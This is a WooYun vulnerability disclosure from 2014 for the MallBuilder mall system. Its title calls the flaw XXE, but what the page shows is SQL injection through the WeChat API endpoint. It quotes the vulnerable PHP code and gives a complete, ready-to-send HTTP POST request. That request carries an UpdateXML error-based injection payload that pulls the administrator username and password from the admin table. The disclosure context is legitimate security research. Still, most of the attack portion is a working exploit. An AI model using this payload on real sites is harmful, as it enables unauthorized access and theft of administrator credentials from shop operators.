当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-081144

漏洞标题:mallbuilder多用户商城系统XXE注入可以爆管理员用户密码

相关厂商:shop-builder.cn

漏洞作者: nextdoor

提交时间:2014-10-29 12:52

修复时间:2014-12-30 14:44

公开时间:2014-12-30 14:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-29: 细节已通知厂商并且等待厂商处理中
2014-11-03: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-12-28: 细节向核心白帽子及相关领域专家公开
2015-01-07: 细节向普通白帽子公开
2015-01-17: 细节向实习白帽子公开
2014-12-30: 细节向公众公开

简要描述:

mallbuilder多用户商城系统XXE注入

详细说明:

系统 MallBuilder_v5.8.1.1
api/wechat.php中

<?php
include_once("../includes/global.php");
@include_once("../config/wechat_config.php");
$wechat=$wechat_config['wechat']?$wechat_config['wechat']:"";
define("TOKEN", $wechat);
$wechatObj = new wechatCallbackapiTest();
if($_GET["echostr"]&&$_GET["signature"]&&$_GET["timestamp"]&&$_GET["nonce"])
//if后的get值不存在进入else语句
{
$wechatObj->valid();
}
else
{
$wechatObj->responseMsg(); //跟踪responseMsg()函数
}
class wechatCallbackapiTest
{
public function valid()
{
$echoStr = $_GET["echostr"];
if($this->checkSignature()){
echo $echoStr;
exit;
}
}
public function responseMsg()
{
$postStr = $GLOBALS["HTTP_RAW_POST_DATA"];
global $db,$config;
if (!empty($postStr)){

$postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);

$fromUsername = $postObj->FromUserName;
$toUsername = $postObj->ToUserName;
$keyword = trim($postObj->Content);
$time = time();
$RX_TYPE = trim($postObj->MsgType);
$num=0;

$str="";

if($RX_TYPE=='text')//是POST的MsgType为text
{

if(!empty($keyword)) //在xml数据中定义Content变量
{

$sql="select pname,id,pic from ".PRO." where pname like '%$keyword%' order by id desc limit 0,4"; //Content 进入sql语句,可以注入
$db->query($sql);
$re=$db->getRows();
foreach($re as $val)
{
$str.="<item>
<Title><![CDATA[".$val['pname']."]]></Title>
<Description><![CDATA[]]></Description>
<PicUrl><![CDATA[".$val['pic']."]]></PicUrl>
<Url><![CDATA[".$config['weburl']."?m=product&s=detail&id=".$val['id']."]]></Url>
</item>";
$num++;
echo "test2";
}
if($num>0)
{
$textTpl = "<xml>
<ToUserName><![CDATA[%s]]></ToUserName>
<FromUserName><![CDATA[%s]]></FromUserName>
<CreateTime>%s</CreateTime>
<MsgType><![CDATA[news]]></MsgType>
<ArticleCount>".$num."</ArticleCount>
<Articles>".$str."</Articles>
<FuncFlag>1</FuncFlag>
</xml>";
$msgType = "text";
$contentStr = "";
$resultStr = sprintf($textTpl, $fromUsername, $toUsername, $time, $msgType, $contentStr);
echo $resultStr;

}
}
else
echo "Input something1 ";
}
else{
echo "Input something2 ";
}
}else{
echo "";
echo "test6";
exit;
}
}
private function checkSignature()
{
$signature = $_GET["signature"];
$timestamp = $_GET["timestamp"];
$nonce = $_GET["nonce"];

$token = TOKEN;
$tmpArr = array($token, $timestamp, $nonce);
sort($tmpArr);
$tmpStr = implode( $tmpArr );
$tmpStr = sha1( $tmpStr );

if( $tmpStr == $signature ){
return true;
}else{
return false;
}
}
}
?>


POST 提交的代码

POST /mallbuilder/api/wechat.php HTTP/1.1
Host: 127.0.0.1:8088
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=fdb687e31fb1d9a23b1b5dc3221123f9
<xml>
<ToUserName>test1</ToUserName>
<FromUserName>test3</FromUserName>
<CreateTime>123456</CreateTime>
<MsgType>text</MsgType>
<ArticleCount>11</ArticleCount>
<Articles>aaa</Articles>
<FuncFlag>0</FuncFlag>
<Content>test' and UpdateXML(1,CONCAT(0x5b,mid((SELECT (select concat(user,0x23,password) from mallbuilder_admin limit 1)),1,32),0x5d),1)#</Content>
</xml>

漏洞证明:

mall1.PNG

mall2.PNG


官网demo演示

mall3.PNG

修复方案:

版权声明:转载请注明来源 nextdoor@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-30 14:44

厂商回复:

最新状态:

暂无